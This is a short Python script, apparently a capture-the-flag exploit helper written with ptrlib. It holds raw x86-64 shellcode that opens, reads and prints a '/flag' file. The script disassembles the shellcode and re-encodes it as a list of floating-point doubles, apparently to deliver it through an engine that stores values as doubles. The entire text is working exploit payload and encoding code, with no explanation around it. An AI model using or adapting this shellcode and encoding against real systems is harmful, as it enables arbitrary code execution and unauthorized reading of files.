from ptrlib import *
from struct import *

p = lambda x: unpack("<d", x)[0]
u = lambda x: pack("<d", x)

shellcode = b"\xeb\x3f\x5f\x80\x77\x05\x41\x48\x31\xc0\x04\x02\x48\x31\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01\x0f\x05\x66\x81\xc4\xff\x0f\xc3\x90\xe8\xbc\xff\xff\xff/flag\x41"

print(disasm(shellcode, returns=str))

sc = []
i = 0
for piece in chunks(shellcode, 8, padding=b'\x90'):
    x = p(p64(u64(piece) - 0x0002000000000000))
    sc.append(x)
    i += 1
    #print(hex(u32(piece)))

print(sc)
